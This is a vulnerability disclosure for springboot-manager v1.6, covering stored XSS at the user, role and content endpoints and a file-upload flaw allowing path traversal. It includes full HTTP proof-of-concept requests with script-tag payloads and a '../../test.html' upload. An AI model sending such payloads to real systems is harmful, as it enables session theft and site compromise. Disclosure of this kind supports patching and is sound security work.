Skip to content

Latest commit

 

History

History
243 lines (151 loc) · 7.14 KB

springboot-manager.md

File metadata and controls

243 lines (151 loc) · 7.14 KB

Project

Address: springboot-manager

1. Stored cross-site scripting

1.1 Stored cross-site scripting /sys/user

[Suggested description]

There is a risk at interface: /sys/user that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sys/user

POC

Enter the XSS code:

PUT /sys/user HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 195
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"1745973977530089473","deptId":"4bd0b0a3-097d-4902-a1f7-641ea3b771bd","username":"test<script>alert(1)</script>","password":"123456","phone":"15515512345","deptName":"部门1","status":"1"}

Trigger vulnerability:

POST /sys/users HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The vulnerability trigger point is in User Management, the vulnerability parameter is username:

1705111803448

Trigger vulnerability

1705111950693

image

1.2 Stored cross-site scripting /sys/role

[Suggested description]

There is a risk at interface: /sys/role that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sys/role

POC

Enter the XSS code:

PUT /sys/role HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 135
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"1745993356841861121","name":"<script>alert(1)</script>","description":"<script>alert(2)</script>","status":"1","permissions":[]}

Trigger vulnerability:

POST /sys/roles HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The vulnerability trigger is in Role Management, the vulnerability parameter is name and description:

1705112783159

Trigger vulnerability

1705112894082

1705112804982

1705112810735

1.3 Stored cross-site scripting /sysContent/add

[Suggested description]

There is a risk at interface: /sysContent/add that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sysContent/add

POC

Enter the XSS code:

POST /sysContent/add HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 104
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"","title":"<script>alert(1)</script>","type":"0","content":"<script>alert(2)</script>","file":""}

Trigger vulnerability:

POST /sysContent/listByPage HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The vulnerability trigger is in Role Management, the vulnerability parameter is title and content:

1705113681656

1705113800478

Trigger vulnerability

a9115525ea4f1e40ea2618d664f7462

1705113750847

image

2. File upload vulnerability

[Suggested description]

The system does not filter the suffixes of uploaded files. As a result, malicious xss files can be uploaded, triggering storage XSS vulnerabilities.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sysFiles/upload

POC

POST /sysFiles/upload?authorization=A96L7u9MTzBj87Je0HWHe77m9v4T3602%23fcf34b56-a7a2-4719-9236-867495e74c31 HTTP/1.1
Host: 192.168.0.100:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysToz7xWVQvklKbQC
Connection: close
Content-Length: 214

------WebKitFormBoundarysToz7xWVQvklKbQC
Content-Disposition: form-data; name="file"; filename="../../test.html"
Content-Type: image/jpeg

<script>alert(1)</script>
------WebKitFormBoundarysToz7xWVQvklKbQC--

[Vulnerability recurrence]

The trigger point of the vulnerability is "File Management" --> "Upload File"

1705118847824

image

1705118929996

[Code analysis]

Call the function sysFilesService.saveFile() to do this

image

Call getFileType() to get the file suffix

1705119331565

The suffix is obtained without any processing, and is simply spliced directly

1705119406946

image